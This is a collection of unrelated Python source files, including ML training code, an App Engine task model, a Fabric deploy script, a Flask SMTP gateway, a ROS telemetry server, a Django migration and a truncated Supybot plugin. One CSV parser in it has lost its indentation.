from parseridge.parser.loss import Criterion
from parseridge.parser.training.base_trainer import Trainer
from parseridge.parser.training.callbacks.base_callback import StopEpoch, StopTraining
from parseridge.parser.training.hyperparameters import Hyperparameters
class StaticTrainer(Trainer):
    """
    This trainer uses pre-generated training samples.
    """
    def fit(
        self,
        epochs: int,
        training_data: ConLLDataset,
        hyper_parameters: Hyperparameters = None,
        **kwargs,
    ) -> None:
        """Train for *epochs* epochs over *training_data*.

        Extra keyword arguments override individual hyper-parameters.
        Raises ValueError if *training_data* is not a ConLLDataset;
        a callback may raise StopTraining to end training early.
        """
        if not isinstance(training_data, ConLLDataset):
            raise ValueError(
                f"The StaticTrainer requires a ConLLDataset object for training, but "
                f"received a {type(training_data)} object."
            )
        hyper_parameters = (hyper_parameters or Hyperparameters()).update(**kwargs)
        # Resume epoch numbering from a previous fit() call, if any.
        initial_epoch = self.last_epoch
        self.callback_handler.on_train_begin(
            epochs=epochs + initial_epoch, hyper_parameters=hyper_parameters
        )
        for epoch in range(initial_epoch + 1, epochs + initial_epoch + 1):
            try:
                self._run_epoch(epoch, training_data, hyper_parameters)
            except StopTraining:
                self.logger.info(f"Stopping training after {epoch} epochs.")
                break
        self.callback_handler.on_train_end()
    def _run_epoch(
        self, epoch: int, training_data: ConLLDataset, hyper_parameters: Hyperparameters
    ):
        """Run one training epoch: iterate shuffled batches, compute the loss,
        back-propagate via self.learn(), and fire the batch/epoch callbacks.
        A callback may raise StopEpoch to cut the epoch short."""
        train_dataloader = DataLoader(
            dataset=training_data,
            batch_size=hyper_parameters.batch_size,
            shuffle=True,
            collate_fn=ConLLDataset.collate_batch,
        )
        num_batches = int(len(training_data) / hyper_parameters.batch_size)
        self.callback_handler.on_epoch_begin(
            epoch=epoch, num_batches=num_batches, training_data=training_data
        )
        criterion = Criterion(loss_function=hyper_parameters.loss_function)
        epoch_loss = 0
        for i, batch_data in enumerate(train_dataloader):
            try:
                self.callback_handler.on_batch_begin(batch=i, batch_data=batch_data)
                batch = ConLLDataset.TrainingBatch(*batch_data)
                pred_transitions, pred_relations = self.model(
                    stacks=batch.stacks,
                    stack_lengths=batch.stack_lengths,
                    buffers=batch.buffers,
                    buffer_lengths=batch.buffer_lengths,
                    token_sequences=batch.sentences,
                    sentence_lengths=batch.sentence_lengths,
                )
                # Compute loss. Depending on the chosen loss strategy only a part of the
                # arguments will actually be used in the computations of the loss value.
                loss = criterion(
                    pred_transitions=pred_transitions,
                    gold_transitions=batch.gold_transitions,
                    pred_relations=pred_relations,
                    gold_relations=batch.gold_relations,
                    wrong_transitions=batch.wrong_transitions,
                    wrong_transitions_lengths=batch.wrong_transitions_lengths,
                    wrong_relations=batch.wrong_relations,
                    wrong_relations_lengths=batch.wrong_relations_lengths,
                )
                self.learn(loss)
                # Detach to a plain float before accumulating.
                loss = loss.item()
                epoch_loss += loss
                self.last_epoch = epoch
                self.callback_handler.on_batch_end(
                    batch=i, batch_data=batch_data, batch_loss=loss
                )
            except StopEpoch:
                self.logger.info(f"Stopping epoch after {i}/{num_batches} batches.")
                break
        self.callback_handler.on_epoch_end(epoch=epoch, epoch_loss=epoch_loss)
|
class Store:
    """Minimal store record: a name plus a mapping of item -> sales amount.

    NOTE(review): `store_sale` is a class-level mutable dict shared by
    all instances; assign per-instance dicts in an __init__ if
    independent stores are ever needed.
    """

    store_name = None
    store_sale = {}

    def generate_Report(self, store_name=None):
        """Print a sales report for *store_name*; warn and return None if missing.

        The original body ended with a dangling `else:` (truncated file /
        SyntaxError); this completes it with the obvious report output and
        returns the sales mapping so callers can inspect it.
        """
        if store_name is None:
            print('provide the store(name) of the you want the { Generate_Report }')
            return None
        print('Report for store:', store_name)
        for item, amount in self.store_sale.items():
            print(item, ':', amount)
        return self.store_sale
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
def printAll(*args):
    """Print the number of positional arguments, then each one on its own line."""
    print("No of arguments:", len(args))
    for value in args:
        print(value)


# printAll with 3 arguments
printAll('Horsefeather','Adonis','Bone')
# printAll with 4 arguments
printAll('Sidecar','Long Island','Mudslide','Carriage')
# In[3]:
def printer(*args):
    """Report how many positional arguments were received."""
    print('there are ', len(args), ' arguements')


printer('Horsefeather','Adonis','Bone')
# In[36]:
def printDictionary(**args):
    """Print the keyword-argument dict, then each key on its own line."""
    print(args)
    for key in args:
        print(key)


printDictionary(Country='Canada',Province='Ontario',City='Toronto')
# Come up with a function that divides the first input by the second input:
#
# In[26]:
def divider(a, b):
    """Print the quotient of a / b truncated toward zero."""
    # NOTE: int(a / b) truncates toward zero, unlike floor division `//`.
    print(int(a / b))


divider(10,2)
# In[27]:
# Use the con function for the following question
def con(a, b):
    """Return a + b, using whatever '+' means for the operand types."""
    return a + b


# In[28]:
con(2,2)
# In[30]:
con('a','b')
# In[34]:
con(('1'),('2'))
# You have been tasked with creating a lab that demonstrates the basics of probability by simulating a bag filled with colored balls. The bag is represented using a dictionary called "bag", where the key represents the color of the ball and the value represents the no of balls. The skeleton code has been made for you, do not add or remove any functions. Complete the following functions -
#
# fillBag - A function that packs it's arguments into a global dictionary "bag".
# totalBalls - returns the total no of balls in the bucket
# probOf - takes a color (string) as argument and returns probability of drawing the selected ball. Assume total balls are not zero and the color given is a valid key.
# probAll - returns a dictionary of all colors and their corresponding probability
# In[46]:
def fillBag(**specs):
    """Pack keyword arguments (color=count) into the global dictionary ``bag``."""
    global bag
    bag = specs

def totalBalls():
    """Return the total number of balls currently in ``bag``."""
    return sum(bag.values())

def probOf(color):
    """Return the probability of drawing a ball of ``color``.

    Assumes ``color`` is a valid key and the bag is not empty.
    """
    return bag[color] / totalBalls()

def probAll():
    """Return a dict mapping every color in the bag to its draw probability.

    Bug fix: the original printed via an undefined callable ``prob`` and
    returned None, while the grading harness below compares the return
    value of probAll() against a dict.
    """
    return {color: probOf(color) for color in bag}
# In[49]:
# --- Grading harness for the bag functions defined above ---
# Expected values are computed independently of the student functions.
testBag = dict(red=12, blue=20, green=14, grey=10)
dictCasting = dict(a=1, b=2, c=3)
print(dictCasting)
total = sum(testBag.values())
prob = {}
for color in testBag:
    prob[color] = testBag[color] / total

def testMsg(passed):
    """Map a boolean grading result onto its display string."""
    return 'Test Passed' if passed else ' Test Failed'

print("fillBag : ")
try:
    fillBag(**testBag)
    print(testMsg(bag == testBag))
except NameError as e:
    print('Error! Code: {c}, Message: {m}'.format(c=type(e).__name__, m=str(e)))
except:
    print("An error occured. Recheck your function")

print("totalBalls : ")
try:
    print(testMsg(total == totalBalls()))
except NameError as e:
    print('Error! Code: {c}, Message: {m}'.format(c=type(e).__name__, m=str(e)))
except:
    print("An error occured. Recheck your function")

print("probOf")
try:
    passed = True
    for color in testBag:
        if probOf(color) != prob[color]:
            passed = False
    print(testMsg(passed))
except NameError as e:
    print('Error! Code: {c}, Message: {m}'.format(c=type(e).__name__, m=str(e)))
except:
    print("An error occured. Recheck your function")

print("probAll")
try:
    print(testMsg(probAll() == prob))
except NameError as e:
    print('Error! Code: {c}, Message: {m}'.format(c=type(e).__name__, m=str(e)))
except:
    print("An error occured. Recheck your function")
# In[ ]:
|
import shutil
from unittest import TestCase
from segmentation_rt.rs2mask.dcm2mask import Dataset
# Fixture locations for the cheese DICOM test data.
TEST_IPP = 'tests/test_data/cheese_dcm'
TEST_RS = 'tests/test_data/cheese_dcm/cheese_dcm_1/RS1.2.752.243.1.1.20210208111802158.1580.88111.dcm'


class TestDataset(TestCase):
    """Exercise Dataset RS discovery and structure lookup on the fixture."""

    def setUp(self):
        # 'missing' is deliberately absent from the RS file so that
        # find_structures reports exactly one missing structure.
        wanted = ['External', 'max', 'missing']
        self.dataset = Dataset(TEST_IPP, "dataset_cheese", wanted)

    def tearDown(self):
        # Remove whatever the Dataset wrote so each test starts clean.
        shutil.rmtree(self.dataset.path_dataset, ignore_errors=True)

    def test_get_rs(self):
        self.assertEqual([TEST_RS], self.dataset.get_rs())

    def test_find_structures(self):
        missing, not_missing = self.dataset.find_structures(0)
        self.assertEqual(len(missing), 1)
        self.assertEqual(['External', 'max'], list(not_missing))
|
def main():
    """Entry point: run the demo function and construct an A instance."""
    run()
    instance = A(1)

def run():
    print("I am running")

class A(object):
    """Trivial placeholder class; the constructor ignores its argument."""
    def __init__(self, arg):
        pass

if __name__ == '__main__':
    main()
|
from google.appengine.ext import ndb
from models.AppUserModel import AppUserMethods
import datetime
from models.TaskboardModel import TaskboardMethods
class Task(ndb.Model):
    """Datastore model for a single task on a taskboard."""
    # taskboard task belongs to
    taskboard = ndb.KeyProperty()
    # title of task
    title = ndb.StringProperty()
    # description of task
    description = ndb.TextProperty()
    # due_date of task
    due_date = ndb.DateTimeProperty()
    # AppUser task is assigned to
    assigned_to = ndb.KeyProperty()
    # True if completed, False if ongoing
    status = ndb.BooleanProperty()
    # User who created task
    created_by = ndb.KeyProperty()
    # date when task was created.
    # Bug fix: auto_now=True re-stamped this field on every put(), so the
    # creation date drifted on each update; auto_now_add writes it once.
    created_date = ndb.DateTimeProperty(auto_now_add=True)
    # date when task was last updated (re-stamped on every put)
    updated_date = ndb.DateTimeProperty(auto_now=True)
    # completion date when task was marked completed
    completed_date = ndb.DateProperty()
class TaskMethods:
    """Static helpers for querying and mutating Task entities."""

    def __init__(self):
        pass

    @staticmethod
    def task_to_dictionary(task):
        """Serialize a Task entity into a JSON-friendly dict for the UI.

        Adds derived display fields: remaining/overdue text, status text,
        and how early/late the task was completed relative to its due date.
        """
        # Snapshot "now" once so all derived fields agree with each other.
        now = datetime.datetime.now()
        if task.due_date > now:
            due_date_text = str((task.due_date - now).days) + ' days remaining'
        else:
            due_date_text = str((now - task.due_date).days) + ' days overdue'
        if task.completed_date:
            completed_date = task.completed_date.strftime('%Y-%m-%d')
            if task.due_date.date() > task.completed_date:
                completed_date_text = str((task.due_date.date() - task.completed_date).days) + ' days before due'
            else:
                completed_date_text = str((task.completed_date - task.due_date.date()).days) + ' days after due'
        else:
            completed_date = None
            completed_date_text = None
        return {
            'id': task.key.id(),
            'taskboard_id': task.taskboard.id(),
            'title': task.title,
            'description': task.description,
            'due_date': task.due_date.strftime('%Y-%m-%d'),
            'due_date_text': due_date_text,
            'overdue': task.due_date < now,
            'assigned_to_email': task.assigned_to.get().email if task.assigned_to else 'unassigned',
            'assigned_to': task.assigned_to.get().key.id() if task.assigned_to else None,
            'status': task.status,
            'status_text': 'completed' if task.status else 'ongoing',
            'created_by': task.created_by.get().email,
            'created_date': task.created_date.strftime('%Y-%m-%d'),
            'updated_date': task.updated_date.strftime('%Y-%m-%d'),
            'creator': task.created_by.get().email == AppUserMethods.get_current_user().email,
            'completed_date': completed_date,
            'completed_date_text': completed_date_text,
        }

    @staticmethod
    def get_all_tasks():
        """Return every Task in the datastore."""
        return Task.query().fetch()

    @staticmethod
    def get_all_tasks_by_taskboard(taskboard_id):
        """Return all tasks belonging to the given taskboard."""
        taskboard_id = int(str(taskboard_id).strip())
        taskboard_key = TaskboardMethods.get_by_id(taskboard_id).key
        return Task.query(Task.taskboard == taskboard_key).fetch()

    @staticmethod
    def get_all_tasks_by_taskboard_and_member(taskboard_id, app_user_id):
        """Return the taskboard's tasks that are assigned to the given user."""
        taskboard_id = int(str(taskboard_id).strip())
        app_user_id = int(str(app_user_id).strip())
        taskboard_key = TaskboardMethods.get_by_id(taskboard_id).key
        app_user_key = AppUserMethods.get_user_key(app_user_id)
        return Task.query(Task.taskboard == taskboard_key).filter(Task.assigned_to == app_user_key).fetch()

    @staticmethod
    def get_by_id(id):
        """Fetch a Task by integer id (tolerates numeric strings)."""
        id = int(str(id).strip())
        return Task.get_by_id(id)

    @staticmethod
    def exists_task(title, id=False):
        """Return True if a task with the same (stripped) title exists.

        When ``id`` is given, that task is excluded so a task may keep its
        own title on update.
        """
        title = title.strip()
        query = Task.query(Task.title == title)
        if id:
            id = int(str(id).strip())
            query = query.filter(Task.key != ndb.Key(Task, id))
        # Bug fix: the original tested the Query object itself, which is
        # always truthy; fetch the first match and test that instead.
        return query.get() is not None

    @staticmethod
    def update_task(id, title, description, due_date, assigned_to, status):
        """Update an existing task.

        Returns the task on success, or False when the new title collides
        with another task's title.
        """
        id = int(str(id).strip())
        title = title.strip()
        task = Task.get_by_id(id)
        task.title = title
        task.description = description.strip()
        task.due_date = datetime.datetime.strptime(due_date.strip(), '%Y-%m-%dT%H:%M:%S.%fZ')
        task.assigned_to = AppUserMethods.get_user_key(int(assigned_to))
        task.status = bool(status)
        task.updated_date = datetime.datetime.now()
        # Completing a task stamps today's date; reopening clears it.
        if task.status:
            task.completed_date = datetime.date.today()
        else:
            task.completed_date = None
        if not TaskMethods.exists_task(title, id):
            task.put()
        else:
            task = False
        return task

    @staticmethod
    def insert_task(taskboard_id, title, description, due_date, assigned_to):
        """Create a new (ongoing) task.

        Returns the task on success, or False when a task with the same
        title already exists.
        """
        task = Task()
        task.taskboard = TaskboardMethods.get_by_id(taskboard_id).key
        task.title = title.strip()
        task.description = description.strip()
        task.due_date = datetime.datetime.strptime(due_date.strip(), '%Y-%m-%dT%H:%M:%S.%fZ')
        task.assigned_to = AppUserMethods.get_user_key(int(assigned_to))
        task.status = False
        task.updated_date = datetime.datetime.now()
        task.created_date = datetime.datetime.now()
        task.completed_date = None
        task.created_by = AppUserMethods.get_current_user().key
        if not TaskMethods.exists_task(title):
            task.put()
        else:
            task = False
        return task

    @staticmethod
    def put_task(taskboard_id, title, description, due_date, assigned_to, status=None, id=None):
        """Upsert: update when ``id`` is given, otherwise insert."""
        return TaskMethods.update_task(id, title, description, due_date, assigned_to, status) if id \
            else TaskMethods.insert_task(taskboard_id, title, description, due_date, assigned_to)

    @staticmethod
    def delete_task(id):
        """Delete a task by id."""
        id = int(str(id).strip())
        # Bug fix: ndb.Key construction always succeeds, so the original
        # 'if key' guard could never take its False branch; deleting a
        # missing entity is a datastore no-op.
        return ndb.Key(Task, id).delete()

    @staticmethod
    def unassign_tasks(tasks):
        """Clear the assignee on every task in ``tasks``; always returns True."""
        for task in tasks:
            task.assigned_to = None
            task.put()
        return True

    @staticmethod
    def mark_as_complete(task_id):
        """Mark a task completed as of today and persist it."""
        task = TaskMethods.get_by_id(int(task_id))
        task.status = True
        task.completed_date = datetime.date.today()
        task.put()
        return task

    @staticmethod
    def mark_as_ongoing(task_id):
        """Reopen a task (clears its completion date) and persist it."""
        task = TaskMethods.get_by_id(int(task_id))
        task.status = False
        task.completed_date = None
        task.put()
        return task

    @staticmethod
    def get_open_tasks_count(taskboard):
        """Count ongoing tasks on the board.

        NOTE(review): count(100) caps the result at 100, unlike the closed/
        total counters below — confirm whether the cap is intentional.
        """
        return Task.query(Task.taskboard == taskboard.key).filter(Task.status == False).count(100)

    @staticmethod
    def get_closed_tasks_count(taskboard):
        """Count completed tasks on the board."""
        return Task.query(Task.taskboard == taskboard.key).filter(Task.status == True).count()

    @staticmethod
    def get_total_tasks_count(taskboard):
        """Count all tasks on the board. (Removed a dead 'pass' after return.)"""
        return Task.query(Task.taskboard == taskboard.key).count()

    @staticmethod
    def get_closed_today_tasks_count(taskboard):
        """Count tasks on the board completed today. (Removed dead 'pass'.)"""
        return Task.query(Task.taskboard == taskboard.key).filter(Task.status == True).filter(Task.completed_date == datetime.date.today()).count()
|
#!/usr/bin/python3
"""Fabric script (based on the file 1-pack_web_static.py) that
distributes an archive to your web servers, using the function do_deploy:"""
from fabric.api import *
import time
from os import path
env.hosts = ['35.237.41.190', '3.90.183.111']


def do_deploy(archive_path):
    """Upload ``archive_path`` to every host in env.hosts and activate it.

    Returns True when the new release is live, False on any failure
    (missing archive, upload error, or remote command error).
    """
    if path.isfile(archive_path) is False:
        return False
    try:
        # Release name = archive file name without its extension.
        # Generalized from the original hard-coded slice archive_path[9:-4],
        # which assumed a 9-character "versions/" prefix.
        name = path.splitext(path.basename(archive_path))[0]
        put(archive_path, "/tmp/" + name + ".tgz")
        host_path = "/data/web_static/releases/" + name + "/"
        run("mkdir -p " + host_path)
        run("tar -xzf /tmp/" + name + ".tgz -C " + host_path)
        run("rm /tmp/" + name + ".tgz")
        run("mv /data/web_static/releases/" + name +
            "/web_static/* " + host_path)
        run("rm -rf " + host_path + "web_static")
        run("rm -rf /data/web_static/current")
        run("ln -s " + host_path + " /data/web_static/current")
        print("New version deployed!")
        return True
    except Exception:
        # Any remote failure aborts the deploy; report failure to the caller.
        return False
|
import smtplib, ssl
from datetime import datetime, timezone
from flask import Flask
from flask_restx import Api, Resource, fields
from werkzeug.middleware.proxy_fix import ProxyFix
from config import Config, log
# Flask app behind a reverse proxy; ProxyFix restores the real client info
# from X-Forwarded-* headers.
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
# Swagger-documented API root and the 'mail' namespace for all endpoints.
api = Api(app, version='1.0', title='SMTP API Gateway',
description='A simple API gateway to send email messages over SMTP service in Gmail',)
ns = api.namespace('mail', description='mail operations')
# Request/response schema for a message; id and timestamp are server-set.
message = api.model('Message', {
'id': fields.Integer(readonly=True, description='Message unique identifier'),
'to': fields.String(required=True, description='Recipient email address'),
'subject': fields.String(required=True, description='Email subject'),
'body': fields.String(required=False, description='Email body (optional)'),
'timestamp': fields.DateTime(readonly=True)
})
class MessageDAO(object):
    """In-memory store of sent messages with auto-incrementing integer ids."""

    def __init__(self):
        # Next id to hand out; ids start at 1.
        self.counter = 1
        self.messages = []

    def get(self, id):
        """Return the message with the given id, or abort the request with 404."""
        for message in self.messages:
            if message['id'] == id:
                return message
        api.abort(404, f'Message with id: {id} does not exist')

    def create(self, data):
        """Stamp ``data`` with an id and a UTC ISO timestamp and store it."""
        message = data
        # Bug fix: the original incremented *before* assigning, so the first
        # message received id 2; assign the current counter, then advance.
        message['id'] = self.counter
        self.counter += 1
        message['timestamp'] = datetime.isoformat(datetime.now(tz=timezone.utc))
        self.messages.append(message)
        return message

DAO = MessageDAO()
@ns.route('/')
class Mail(Resource):
    """REST resource: list sent messages and send new ones over SMTP."""

    @ns.doc('list_messages')
    def get(self):
        """List all messages sent"""
        return DAO.messages

    @ns.doc('send_message')
    @ns.expect(message)
    def post(self):
        """Send new SMTP message"""
        data = api.payload
        # Local renamed from 'message' to avoid shadowing the module-level
        # api.model of the same name.
        body = f'Subject: {data["subject"]}\n\n{data["body"]}'
        # Bug fix: define 'server' before the try block so the finally
        # clause cannot raise NameError when smtplib.SMTP() itself fails.
        server = None
        try:
            server = smtplib.SMTP(Config.smtp_server, Config.smtp_port)
            server.ehlo()
            if Config.use_starttls:
                context = ssl.create_default_context()
                server.starttls(context=context)
                server.ehlo()
            if Config.smtp_password:
                server.login(Config.smtp_username, Config.smtp_password)
            server.sendmail(Config.from_email, data['to'], body)
        except Exception as e:
            log.error(f'mail send failed with error: {e}')
            api.abort(500, f'mail send failed with error: {e}')
        finally:
            if server is not None:
                server.quit()
        # Record the message only after a successful send.
        DAO.create(data)
        return {'status': 'ok'}
# Run the development server when executed directly (binds all interfaces).
if __name__ == '__main__':
    app.run(debug=Config.debug, host='0.0.0.0')
|
#!/usr/bin/env python
# Authors: Trevor Sherrard,
# Since: 02/10/2020
# Project: RIT MSD P20250 Finger Lakes ROV Exploration
# filename: flask_node.py
# import required libraries
import rospy
import time
import threading
from std_msgs.msg import Float32MultiArray
from std_msgs.msg import Int8
from flask import Flask
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
# Declare and initialize the globals shared between the ROS subscriber
# callbacks (writers) and the Flask routes (readers).
global imuData
imuData = [0,0,0,0,0,0,0,0,0]
global VertMotionSpeed, rotationSpeed, HoriMotionSpeed
VertMotionSpeed, HoriMotionSpeed, rotationSpeed = (0, 0, 0)
global cruiseControlEnabled, lightSetting, AButtonState
cruiseControlEnabled, lightSetting, AButtonState = (0, 0, 0)
def imuDataCallback(msg):
    """Store the latest IMU sample."""
    global imuData
    imuData = msg.data

def buttonStateCallback(msg):
    """Store the latest A-button state."""
    global AButtonState
    AButtonState = msg.data

def lightSettingCallback(msg):
    """Store the latest light setting."""
    global lightSetting
    lightSetting = msg.data

def VertMotionSpeedCallback(msg):
    """Store the latest vertical motion speed."""
    global VertMotionSpeed
    VertMotionSpeed = msg.data

def HoriMotionSpeedCallback(msg):
    """Store the latest horizontal motion speed.

    Bug fix: this callback was named HoriMotionSpeed, which clobbered the
    module-level variable of the same name — /motiondata returned a
    function repr until the first message arrived. Renamed *Callback to
    match every other subscriber.
    """
    global HoriMotionSpeed
    HoriMotionSpeed = msg.data

def rotationSpeedCallback(msg):
    """Store the latest rotation speed."""
    global rotationSpeed
    rotationSpeed = msg.data

def cruiseControlCallback(msg):
    """Store the latest cruise-control flag."""
    global cruiseControlEnabled
    cruiseControlEnabled = msg.data

@app.route("/imu")
def imuDataFlask():
    """Return '<timestamp>!<imu tuple>' for the UI."""
    global imuData
    now = rospy.get_time()
    return str(now) + "!" + str(imuData)

@app.route("/missiondata")
def missionDataFlask():
    """Return timestamp plus temp/depth/pressure readings.

    NOTE(review): temp/depth/pressure are hard-coded placeholders.
    """
    now = rospy.get_time()
    temp = "70"
    depth = "250"
    pressure = "7470"
    return str(now) + "!" + temp + "!" + depth + "!" + pressure + "!"

@app.route("/motiondata")
def motionDataFlask():
    """Return timestamp plus vertical, rotation, and horizontal speeds."""
    now = rospy.get_time()
    global VertMotionSpeed, rotationSpeed, HoriMotionSpeed
    return str(now) + "!" + str(VertMotionSpeed) + "!" + str(rotationSpeed) + "!" + str(HoriMotionSpeed)

@app.route("/misccmddata")
def miscCommandsFlask():
    """Return timestamp plus cruise-control and A-button states."""
    now = rospy.get_time()
    global cruiseControlEnabled, AButtonState
    # Bug fix: AButtonState is an int; concatenating it directly onto a
    # str raised TypeError. Wrap it in str() like the other fields.
    return str(now) + "!" + str(cruiseControlEnabled) + "!" + str(AButtonState)

def main():
    """Init the ROS node, subscribe to telemetry topics, start Flask."""
    # init node on a side thread so Flask can own the main thread
    threading.Thread(target=lambda: rospy.init_node('flask_node', disable_signals=True)).start()
    print("node initalized...")
    # start subscribing to telemetry topics
    rospy.Subscriber("/imu_data", Float32MultiArray, imuDataCallback)
    rospy.Subscriber("/AButtonState", Int8, buttonStateCallback)
    rospy.Subscriber("/LightSetting", Int8, lightSettingCallback)
    rospy.Subscriber("/VertMotionSpeed", Int8, VertMotionSpeedCallback)
    rospy.Subscriber("/HorizontalMotionSpeed", Int8, HoriMotionSpeedCallback)
    rospy.Subscriber("/rotationSpeed", Int8, rotationSpeedCallback)
    rospy.Subscriber("/cruiseEnabled", Int8, cruiseControlCallback)
    print("began subscribing to data ...")
    app.run(host="0.0.0.0", port=5000)

if __name__ == "__main__":
    main()
|
import csv, sys, os
if len(sys.argv) != 2:
print "Usage: python %s <spreadsheet.csv>" % os.path.basename(__file__)
sys.exit(0)
filename = sys.argv[1]
print "---Battle Tower CSV Parser---"
print " version 0.0.3 "
print
print "Loading " + filename + "..."
print
#list to store the items
floors = [None] * 10
with open(filename, 'r') as chart:
#filter out commented lines (start with #)
reader = csv.reader(filter(lambda row: row[0]!='#', chart))
#get the names of each floor (because i'm lazy)
floor_names = next(reader)
#initialize floors
for i, name in enumerate(floor_names):
floors[i] = []
#iterate over csv and add items to table
for row in reader:
for i, item in enumerate(row):
if len(item) > 0:
floors[i].append(item)
print "Preparing Config File..."
config = open("config.txt", "w")
config.write("battletowerchestitems {\n")
for i in range(0,9):
config.write(' ')
config.write('S:"Floor %s"=' % str(i+1))
for item in floors[i]:
config.write(item)
config.write(';')
config.write('\n')
config.write(' S:"Top Floor"=')
for item in floors[9]:
config.write(item)
config.write(';')
config.write('\n}')
print "done!"
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-08 13:01
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates Agendamento, ChefeDeDepartamento,
    Funcionario and Recurso, and adds Usuario.isChefe. Generated migrations
    should stay byte-stable; only comments were added here."""
    dependencies = [
        ('recursos', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Agendamento',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        # Multi-table inheritance: ChefeDeDepartamento extends Usuario.
        migrations.CreateModel(
            name='ChefeDeDepartamento',
            fields=[
                ('usuario_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='recursos.Usuario')),
            ],
            bases=('recursos.usuario',),
        ),
        # Multi-table inheritance: Funcionario extends Usuario.
        migrations.CreateModel(
            name='Funcionario',
            fields=[
                ('usuario_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='recursos.Usuario')),
            ],
            bases=('recursos.usuario',),
        ),
        migrations.CreateModel(
            name='Recurso',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.AddField(
            model_name='usuario',
            name='isChefe',
            field=models.BooleanField(default=False),
        ),
    ]
|
from django.urls import path, include
# Aggregate API routing: each sub-app mounts at the root under its own
# URL namespace.
urlpatterns = [
    path('', include('api.users.urls', namespace='users')),
    path('', include('api.menu.urls', namespace='menus')),
    path('', include('api.orders.urls', namespace='orders')),
    path('', include('api.token.urls', namespace='token')),
]
###
# Copyright (c) 2009-2014, Torrie Fischer
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.utils as utils
import supybot.world as world
from supybot.commands import *
import supybot.irclib as irclib
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.schedule as schedule
import supybot.callbacks as callbacks
import random
import time
import re
import sqlite3
import functools
import Queue
import threading
import logging
class QuietNestedCommandsIrcProxy(callbacks.NestedCommandsIrcProxy):
    """Irc proxy that captures replies instead of sending them to the network.

    The last reply text is stashed in ``savedReply`` so callers (e.g. the
    'markov' hand-off in Whatis._reply) can relay it themselves.
    """
    def __init__(self, *args, **kwargs):
        self.savedReply = None
        super(QuietNestedCommandsIrcProxy, self).__init__(*args, **kwargs)
    def getCommandHelp(self, command, simpleSyntax=None):
        # Suppress help output entirely.
        return ""
    def reply(self, s, msg=None, **kwargs):
        # Capture the reply text and swallow the actual IRC response.
        if msg is None:
            msg = self.msg
        self.savedReply = s
        self.noReply()
    def replyError(self, *args, **kwargs):
        self.noReply()
    def replySuccess(self, *args, **kwargs):
        # Bug fix: this override was misspelled 'replySucces', so success
        # notices bypassed the proxy and still went to the network.
        self.noReply()
    def _callCommand(self, command, irc, msg, *args, **kwargs):
        """Run a nested command, honoring capabilities and swallowing errors."""
        self.log.info('%s called by %q.', callbacks.formatCommand(command), msg.prefix)
        try:
            for name in command:
                cap = callbacks.checkCommandCapability(msg, self, name)
                if cap:
                    return
            try:
                self.callingCommand = command
                self.callCommand(command, irc, msg, *args, **kwargs)
            finally:
                self.callingCommand = None
        except:
            # NOTE(review): deliberately best-effort — errors from nested
            # commands are swallowed so the bot stays quiet.
            pass
class Promise(object):
    """One-shot, thread-safe container for a value produced later.

    result() blocks until finish() or errored() is called (possibly from
    another thread), then returns the value or re-raises the stored error.
    """
    def __init__(self):
        self.event = threading.Event()
        self.value = None
        self.exception = None
    def result(self):
        """Block until resolved; return the value or raise the stored error."""
        logging.debug("Waiting to resolve promise")
        self.event.wait()
        logging.debug("Promise finished!")
        err = self.exception
        if err is not None:
            raise err
        return self.value
    def finish(self, val):
        """Resolve successfully with ``val`` and wake any waiters."""
        self.value = val
        self.event.set()
    def errored(self, exc):
        """Resolve with an exception and wake any waiters."""
        self.exception = exc
        self.event.set()
class ThreadProtectionFacade(object):
    """Proxy that confines a wrapped object to a single worker thread.

    Method calls made from any other thread are queued and executed on the
    owner thread; the caller gets back a Promise. Python 2 code (uses the
    Queue module and `except Exception, e` syntax).

    NOTE(review): the constructor's *args/**kwargs are shadowed by f's own
    parameters and never forwarded to wrappedClass — harmless here because
    the facade is only constructed without extra arguments, but confirm.
    """
    def __init__(self, wrappedClass, *args, **kwargs):
        # Defer construction of the wrapped object to the worker thread.
        def f(*args, **kwargs):
            return wrappedClass(*args, **kwargs)
        self.__makeWrapped = f
        self.__wrapEvent = threading.Event()
        self.__jobs = Queue.Queue()
        self.__thread = threading.Thread(target=self.__objThread)
        self.__thread.start()
    def __del__(self):
